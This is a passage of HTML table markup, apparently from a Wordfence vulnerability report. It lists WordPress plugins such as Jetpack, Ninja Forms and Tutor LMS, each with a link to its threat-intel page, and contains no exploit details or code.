			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/elex-request-a-quote" target="_blank" rel="noopener">elex-request-a-quote</a>
		</td>
</tr>
<tr>
<td>Email Subscribers &amp; Newsletters – Email Marketing, Post Notifications &amp; Newsletter Plugin for WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/email-subscribers" target="_blank" rel="noopener">email-subscribers</a>
		</td>
</tr>
<tr>
<td>Event Booking Manager for WooCommerce – Sell Tickets, Event Registration, RSVP &amp; Event Calendar</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mage-eventpress" target="_blank" rel="noopener">mage-eventpress</a>
		</td>
</tr>
<tr>
<td>Event Tickets and Registration</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/event-tickets" target="_blank" rel="noopener">event-tickets</a>
		</td>
</tr>
<tr>
<td>Eventin – Event Calendar, Tickets, Registration, Booking &amp; WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-event-solution" target="_blank" rel="noopener">wp-event-solution</a>
		</td>
</tr>
<tr>
<td>EventON – Events Calendar</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/eventon-lite" target="_blank" rel="noopener">eventon-lite</a>
		</td>
</tr>
<tr>
<td>Everest Forms – Contact Form, Payment Form, Quiz, Survey &amp; Custom Form Builder with AI</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/everest-forms" target="_blank" rel="noopener">everest-forms</a>
		</td>
</tr>
<tr>
<td>Featured Image with URL</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/featured-image-with-url" target="_blank" rel="noopener">featured-image-with-url</a>
		</td>
</tr>
<tr>
<td>FireBox – WooCommerce Popup Builder, Exit Intent Popup, Email Optin &amp; Cart Abandonment</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/firebox" target="_blank" rel="noopener">firebox</a>
		</td>
</tr>
<tr>
<td>Flexible Quantity – Measurement Price Calculator for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/flexible-quantity-measurement-price-calculator-for-woocommerce" target="_blank" rel="noopener">flexible-quantity-measurement-price-calculator-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>Floating Chat Widget: Contact Chat Icons, Telegram Chat, Line Messenger, WeChat, Email, SMS, Call Button – Chaty</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/chaty" target="_blank" rel="noopener">chaty</a>
		</td>
</tr>
<tr>
<td>Form Maker by 10Web – Mobile-Friendly Drag &amp; Drop Contact Form Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/form-maker" target="_blank" rel="noopener">form-maker</a>
		</td>
</tr>
<tr>
<td>Frontegg SAML SSO</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/frontegg-saml-sso" target="_blank" rel="noopener">frontegg-saml-sso</a>
		</td>
</tr>
<tr>
<td>GamiPress – Gamification plugin to reward points, badges &amp; ranks in WordPress, now with AI</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gamipress" target="_blank" rel="noopener">gamipress</a>
		</td>
</tr>
<tr>
<td>Gato GraphQL</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gatographql" target="_blank" rel="noopener">gatographql</a>
		</td>
</tr>
<tr>
<td>GEO my WP</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/geo-my-wp" target="_blank" rel="noopener">geo-my-wp</a>
		</td>
</tr>
<tr>
<td>Gpx2Graphics</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gpx2graphics" target="_blank" rel="noopener">gpx2graphics</a>
		</td>
</tr>
<tr>
<td>Graphina – Charts and Graphs For Elementor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/graphina-elementor-charts-and-graphs" target="_blank" rel="noopener">graphina-elementor-charts-and-graphs</a>
		</td>
</tr>
<tr>
<td>Groundhogg — CRM, Newsletters, and Marketing Automation</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/groundhogg" target="_blank" rel="noopener">groundhogg</a>
		</td>
</tr>
<tr>
<td>Gutenverse News – News Blocks for Blog &amp; Magazine Sites</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gutenverse-news" target="_blank" rel="noopener">gutenverse-news</a>
		</td>
</tr>
<tr>
<td>Hide My WP Ghost – Security &amp; Firewall</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hide-my-wp" target="_blank" rel="noopener">hide-my-wp</a>
		</td>
</tr>
<tr>
<td>HT Menu – WordPress Mega Menu Builder for Elementor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ht-menu-lite" target="_blank" rel="noopener">ht-menu-lite</a>
		</td>
</tr>
<tr>
<td>HUSKY – Products Filter for WooCommerce Professional</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-products-filter" target="_blank" rel="noopener">woocommerce-products-filter</a>
		</td>
</tr>
<tr>
<td>Hustle – Email Marketing, Lead Generation, Optins, Popups</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wordpress-popup" target="_blank" rel="noopener">wordpress-popup</a>
		</td>
</tr>
<tr>
<td>ilGhera Reviso Exporter for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wc-exporter-for-reviso" target="_blank" rel="noopener">wc-exporter-for-reviso</a>
		</td>
</tr>
<tr>
<td>IMPress for IDX Broker</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/idx-broker-platinum" target="_blank" rel="noopener">idx-broker-platinum</a>
		</td>
</tr>
<tr>
<td>Insert or Embed Articulate Content into WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/insert-or-embed-articulate-content-into-wordpress" target="_blank" rel="noopener">insert-or-embed-articulate-content-into-wordpress</a>
		</td>
</tr>
<tr>
<td>IP2Location Country Blocker</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ip2location-country-blocker" target="_blank" rel="noopener">ip2location-country-blocker</a>
		</td>
</tr>
<tr>
<td>IPGP Visitors Origin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ipgp-visitors-origin" target="_blank" rel="noopener">ipgp-visitors-origin</a>
		</td>
</tr>
<tr>
<td>JCH Optimize</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jch-optimize" target="_blank" rel="noopener">jch-optimize</a>
		</td>
</tr>
<tr>
<td>JetFormBuilder — Dynamic Blocks Form Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jetformbuilder" target="_blank" rel="noopener">jetformbuilder</a>
		</td>
</tr>
<tr>
<td>Jetpack – WP Security, Backup, Speed, &amp; Growth</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jetpack" target="_blank" rel="noopener">jetpack</a>
		</td>
</tr>
<tr>
<td>Kirki – Freeform Page Builder, Website Builder &amp; Customizer</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kirki" target="_blank" rel="noopener">kirki</a>
		</td>
</tr>
<tr>
<td>LearnPress – WordPress LMS Plugin for Create and Sell Online Courses</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress" target="_blank" rel="noopener">learnpress</a>
		</td>
</tr>
<tr>
<td>Live Composer – Free WordPress Website Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/live-composer-page-builder" target="_blank" rel="noopener">live-composer-page-builder</a>
		</td>
</tr>
<tr>
<td>Loops &amp; Logic</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tangible-loops-and-logic" target="_blank" rel="noopener">tangible-loops-and-logic</a>
		</td>
</tr>
<tr>
<td>LukasApps CAPTCHA tools for Contact Form 7</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/contact-form-7-simple-recaptcha" target="_blank" rel="noopener">contact-form-7-simple-recaptcha</a>
		</td>
</tr>
<tr>
<td>Mail Mint – Email Marketing, Automation &amp; WooCommerce Emails with AI Assistance</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mail-mint" target="_blank" rel="noopener">mail-mint</a>
		</td>
</tr>
<tr>
<td>MailMunch – Grow your Email List</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mailmunch" target="_blank" rel="noopener">mailmunch</a>
		</td>
</tr>
<tr>
<td>Master Addons for Elementor – Elementor Addons, Widgets, Mega Menu Builder, Popup Builder, Widget Builder &amp; Template Kits</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/master-addons" target="_blank" rel="noopener">master-addons</a>
		</td>
</tr>
<tr>
<td>Masteriyo LMS – LMS Course Builder, Quizzes &amp; Certificates</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learning-management-system" target="_blank" rel="noopener">learning-management-system</a>
		</td>
</tr>
<tr>
<td>MDJM Event Management</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mobile-dj-manager" target="_blank" rel="noopener">mobile-dj-manager</a>
		</td>
</tr>
<tr>
<td>Media Library Assistant</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/media-library-assistant" target="_blank" rel="noopener">media-library-assistant</a>
		</td>
</tr>
<tr>
<td>MemberPress Corporate Accounts</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/memberpress-corporate" target="_blank" rel="noopener">memberpress-corporate</a>
		</td>
</tr>
<tr>
<td>MetForm – Contact Form, Survey, Quiz, Conditional Forms, Form Templates &amp; Custom Form Builder for Elementor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/metform" target="_blank" rel="noopener">metform</a>
		</td>
</tr>
<tr>
<td>miniOrange 2FA – Two Factor Authentication for WordPress (OTP, SMS, Email, Google Authenticator)</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/miniorange-2-factor-authentication" target="_blank" rel="noopener">miniorange-2-factor-authentication</a>
		</td>
</tr>
<tr>
<td>MIPL Checkout Fields Manager for WooCommerce – Customize, Organize &amp; Group Checkout Fields.</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mipl-wc-checkout-fields" target="_blank" rel="noopener">mipl-wc-checkout-fields</a>
		</td>
</tr>
<tr>
<td>Mobile Events Manager</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mobile-events-manager" target="_blank" rel="noopener">mobile-events-manager</a>
		</td>
</tr>
<tr>
<td>MPG – Multiple Page Generator, Bulk Landing Pages &amp; Programmatic SEO</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/multiple-pages-generator-by-porthas" target="_blank" rel="noopener">multiple-pages-generator-by-porthas</a>
		</td>
</tr>
<tr>
<td>MultiVendorX – WooCommerce Multivendor Marketplace AI Powered Solutions</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/dc-woocommerce-multi-vendor" target="_blank" rel="noopener">dc-woocommerce-multi-vendor</a>
		</td>
</tr>
<tr>
<td>Music Store – WordPress eCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/music-store" target="_blank" rel="noopener">music-store</a>
		</td>
</tr>
<tr>
<td>My Calendar – Accessible Event Manager</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/my-calendar" target="_blank" rel="noopener">my-calendar</a>
		</td>
</tr>
<tr>
<td>Nexi XPay Build</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/nexi-xpay-build" target="_blank" rel="noopener">nexi-xpay-build</a>
		</td>
</tr>
<tr>
<td>Next-Cart Store to WooCommerce Migration</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/nextcart-woocommerce-migration" target="_blank" rel="noopener">nextcart-woocommerce-migration</a>
		</td>
</tr>
<tr>
<td>Ninja Forms – The Contact Form Builder That Grows With You</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ninja-forms" target="_blank" rel="noopener">ninja-forms</a>
		</td>
</tr>
<tr>
<td>Notiqoo – Order Notification &amp; Customer Chat for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wc-messaging" target="_blank" rel="noopener">wc-messaging</a>
		</td>
</tr>
<tr>
<td>Online Scheduling and Appointment Booking System – Bookly</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bookly-responsive-appointment-booking-tool" target="_blank" rel="noopener">bookly-responsive-appointment-booking-tool</a>
		</td>
</tr>
<tr>
<td>Open User Map – Interactive Leaflet Maps</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/open-user-map" target="_blank" rel="noopener">open-user-map</a>
		</td>
</tr>
<tr>
<td>Orbit Fox: Duplicate Page, Menu Icons, SVG Support, Cookie Notice, Custom Fonts &amp; More</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/themeisle-companion" target="_blank" rel="noopener">themeisle-companion</a>
		</td>
</tr>
<tr>
<td>OTP Login &amp; Register Woocommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mobile-login-woocommerce" target="_blank" rel="noopener">mobile-login-woocommerce</a>
		</td>
</tr>
<tr>
<td>Page Visits Counter – Lite</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/page-visits-counter-lite" target="_blank" rel="noopener">page-visits-counter-lite</a>
		</td>
</tr>
<tr>
<td>Passster – Password Protect Pages and Content</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/content-protector" target="_blank" rel="noopener">content-protector</a>
		</td>
</tr>
<tr>
<td>Payment Gateway PayPay for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wc-paypay-gateway" target="_blank" rel="noopener">wc-paypay-gateway</a>
		</td>
</tr>
<tr>
<td>Payment Plugins for PayPal WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pymntpl-paypal-woocommerce" target="_blank" rel="noopener">pymntpl-paypal-woocommerce</a>
		</td>
</tr>
<tr>
<td>Payment Plugins for Stripe WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-stripe-payment" target="_blank" rel="noopener">woo-stripe-payment</a>
		</td>
</tr>
<tr>
<td>PDF Builder for WooCommerce. Create invoices,packing slips and more</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-pdf-invoice-builder" target="_blank" rel="noopener">woo-pdf-invoice-builder</a>
		</td>
</tr>
<tr>
<td>Podlove Podcast Publisher</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/podlove-podcasting-plugin-for-wordpress" target="_blank" rel="noopener">podlove-podcasting-plugin-for-wordpress</a>
		</td>
</tr>
<tr>
<td>Points Management System For Gamification, Ranks, Badges, and Loyalty Rewards Program – myCred</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mycred" target="_blank" rel="noopener">mycred</a>
		</td>
</tr>
<tr>
<td>Post Form – Registration Form – Profile Form for User Profiles – Frontend Content Forms for User Submissions (UGC)</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/buddyforms" target="_blank" rel="noopener">buddyforms</a>
		</td>
</tr>
<tr>
<td>Product Filter for WooCommerce by WBW</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-product-filter" target="_blank" rel="noopener">woo-product-filter</a>
		</td>
</tr>
<tr>
<td>Product XML Feed Manager for WooCommerce – Google Shopping, Social Sites, Skroutz &amp; More</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/product-xml-feeds-for-woocommerce" target="_blank" rel="noopener">product-xml-feeds-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>PublishPress Capabilities: User Role Access Control, Admin Area Permissions</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/capability-manager-enhanced" target="_blank" rel="noopener">capability-manager-enhanced</a>
		</td>
</tr>
<tr>
<td>Quads Ads Manager for Google AdSense</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/quick-adsense-reloaded" target="_blank" rel="noopener">quick-adsense-reloaded</a>
		</td>
</tr>
<tr>
<td>Quentn WP</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/quentn-wp" target="_blank" rel="noopener">quentn-wp</a>
		</td>
</tr>
<tr>
<td>Quiz and Survey Master (QSM) – Quiz Maker &amp; Survey Maker</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/quiz-master-next" target="_blank" rel="noopener">quiz-master-next</a>
		</td>
</tr>
<tr>
<td>Rara One Click Demo Import</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/rara-one-click-demo-import" target="_blank" rel="noopener">rara-one-click-demo-import</a>
		</td>
</tr>
<tr>
<td>Really Simple Security – Simple and Performant Security (formerly Really Simple SSL)</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/really-simple-ssl" target="_blank" rel="noopener">really-simple-ssl</a>
		</td>
</tr>
<tr>
<td>Redux Framework</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/redux-framework" target="_blank" rel="noopener">redux-framework</a>
		</td>
</tr>
<tr>
<td>Registration Form for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/registration-form-for-woocommerce" target="_blank" rel="noopener">registration-form-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>Relevanssi – A Better Search</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/relevanssi" target="_blank" rel="noopener">relevanssi</a>
		</td>
</tr>
<tr>
<td>RepairBuddy – Repair Shop CRM &amp; Booking Plugin for WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/computer-repair-shop" target="_blank" rel="noopener">computer-repair-shop</a>
		</td>
</tr>
<tr>
<td>Repeater Fields for Gravity Forms</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/repeater-for-gravity-forms" target="_blank" rel="noopener">repeater-for-gravity-forms</a>
		</td>
</tr>
<tr>
<td>Return Refund and Exchange For WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-refund-and-exchange-lite" target="_blank" rel="noopener">woo-refund-and-exchange-lite</a>
		</td>
</tr>
<tr>
<td>Robokassa payment gateway for Woocommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/robokassa" target="_blank" rel="noopener">robokassa</a>
		</td>
</tr>
<tr>
<td>Rox Appointment Booking – Appointment Booking Scheduling Solution</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/rox-appointment-booking" target="_blank" rel="noopener">rox-appointment-booking</a>
		</td>
</tr>
<tr>
<td>Royal Addons for Elementor – Addons and Templates Kit for Elementor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/royal-elementor-addons" target="_blank" rel="noopener">royal-elementor-addons</a>
		</td>
</tr>
<tr>
<td>rtMedia for WordPress, BuddyPress and bbPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/buddypress-media" target="_blank" rel="noopener">buddypress-media</a>
		</td>
</tr>
<tr>
<td>RTMKit</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/rometheme-for-elementor" target="_blank" rel="noopener">rometheme-for-elementor</a>
		</td>
</tr>
<tr>
<td>Salon Booking System – Appointment Booking for Salons, Barbershops &amp; Spas</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/salon-booking-system" target="_blank" rel="noopener">salon-booking-system</a>
		</td>
</tr>
<tr>
<td>SEO Flow by LupsOnline</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/lupsonline-link-netwerk" target="_blank" rel="noopener">lupsonline-link-netwerk</a>
		</td>
</tr>
<tr>
<td>Shirt Product Designer for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-shirt-product-designer" target="_blank" rel="noopener">woo-shirt-product-designer</a>
		</td>
</tr>
<tr>
<td>Shopping Cart &amp; eCommerce Store</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-easycart" target="_blank" rel="noopener">wp-easycart</a>
		</td>
</tr>
<tr>
<td>Sidebar Manager Light</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sidebar-manager-light" target="_blank" rel="noopener">sidebar-manager-light</a>
		</td>
</tr>
<tr>
<td>Simple Ajax Chat – Add a Fast, Secure Chat Box</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simple-ajax-chat" target="_blank" rel="noopener">simple-ajax-chat</a>
		</td>
</tr>
<tr>
<td>Simple CAPTCHA with Cloudflare Turnstile</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simple-cloudflare-turnstile" target="_blank" rel="noopener">simple-cloudflare-turnstile</a>
		</td>
</tr>
<tr>
<td>Simple Membership</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simple-membership" target="_blank" rel="noopener">simple-membership</a>
		</td>
</tr>
<tr>
<td>Simple Payment</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simple-payment" target="_blank" rel="noopener">simple-payment</a>
		</td>
</tr>
<tr>
<td>Sina Extension for Elementor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sina-extension-for-elementor" target="_blank" rel="noopener">sina-extension-for-elementor</a>
		</td>
</tr>
<tr>
<td>Site Kit by Google – Analytics, Search Console, AdSense, Speed</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/google-site-kit" target="_blank" rel="noopener">google-site-kit</a>
		</td>
</tr>
<tr>
<td>Site Reviews</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/site-reviews" target="_blank" rel="noopener">site-reviews</a>
		</td>
</tr>
<tr>
<td>SiteSkite MCP AI – Connector for Claude, ChatGPT, Cursor &amp; WordPress WebOps</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/siteskite" target="_blank" rel="noopener">siteskite</a>
		</td>
</tr>
<tr>
<td>Sky Addons for Elementor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sky-elementor-addons" target="_blank" rel="noopener">sky-elementor-addons</a>
		</td>
</tr>
<tr>
<td>Slim SEO – AI SEO Plugin, Lightweight, Fast &amp; Automated</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/slim-seo" target="_blank" rel="noopener">slim-seo</a>
		</td>
</tr>
<tr>
<td>Smart Marketing SMS and Newsletters Forms</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/smart-marketing-for-wp" target="_blank" rel="noopener">smart-marketing-for-wp</a>
		</td>
</tr>
<tr>
<td>SMS Alert – SMS &amp; OTP for WooCommerce, Order Notifications &amp; Abandoned Cart Recovery</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sms-alert" target="_blank" rel="noopener">sms-alert</a>
		</td>
</tr>
<tr>
<td>Spam protection, Honeypot, Anti-Spam by CleanTalk</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cleantalk-spam-protect" target="_blank" rel="noopener">cleantalk-spam-protect</a>
		</td>
</tr>
<tr>
<td>Sprout Invoices – Client Invoicing &amp; Estimates</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sprout-invoices" target="_blank" rel="noopener">sprout-invoices</a>
		</td>
</tr>
<tr>
<td>SSL Zen — SSL Certificate Installer &amp; HTTPS Redirects</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ssl-zen" target="_blank" rel="noopener">ssl-zen</a>
		</td>
</tr>
<tr>
<td>Starter Templates: AI-Powered Website Templates for Elementor &amp; Gutenberg</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/astra-sites" target="_blank" rel="noopener">astra-sites</a>
		</td>
</tr>
<tr>
<td>Sticky Chat Widget – Floating Chat Icons, Contact Form, Call, Click to Chat, Email &amp; Message Buttons</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sticky-chat-widget" target="_blank" rel="noopener">sticky-chat-widget</a>
		</td>
</tr>
<tr>
<td>Sunshine Photo Cart – Client Photo Gallery &amp; Photo Proofing for Photographers</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sunshine-photo-cart" target="_blank" rel="noopener">sunshine-photo-cart</a>
		</td>
</tr>
<tr>
<td>SupportCandy – AI Customer Support Ticket System &amp; Live Chatbot Agent</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/supportcandy" target="_blank" rel="noopener">supportcandy</a>
		</td>
</tr>
<tr>
<td>SureCart – Ecommerce Made Easy For Selling Physical Products, Digital Downloads, Subscriptions, Donations, &amp; Payments</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/surecart" target="_blank" rel="noopener">surecart</a>
		</td>
</tr>
<tr>
<td>SureRank SEO – Meta Tags, Social Preview, XML Sitemap, Schema &amp; Open Graph</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/surerank" target="_blank" rel="noopener">surerank</a>
		</td>
</tr>
<tr>
<td>Teddy Bear Customize Addon</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/teddy-bear-customize-addon" target="_blank" rel="noopener">teddy-bear-customize-addon</a>
		</td>
</tr>
<tr>
<td>Temporary Login Without Password</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/temporary-login-without-password" target="_blank" rel="noopener">temporary-login-without-password</a>
		</td>
</tr>
<tr>
<td>Thanko Thank You Page Customizer for WooCommerce – Increase Your Sales</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-thank-you-page-customizer" target="_blank" rel="noopener">woo-thank-you-page-customizer</a>
		</td>
</tr>
<tr>
<td>The Events Calendar</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/the-events-calendar" target="_blank" rel="noopener">the-events-calendar</a>
		</td>
</tr>
<tr>
<td>ThemeREX Addons</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/trx_addons" target="_blank" rel="noopener">trx_addons</a>
		</td>
</tr>
<tr>
<td>Themify – WooCommerce Product Filter</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/themify-wc-product-filter" target="_blank" rel="noopener">themify-wc-product-filter</a>
		</td>
</tr>
<tr>
<td>Translate WordPress with GTranslate</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gtranslate" target="_blank" rel="noopener">gtranslate</a>
		</td>
</tr>
<tr>
<td>Tutor LMS – eLearning and online course solution</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tutor" target="_blank" rel="noopener">tutor</a>
		</td>
</tr>
<tr>
<td>Ultimate Gift Cards for WooCommerce</td>
<td>
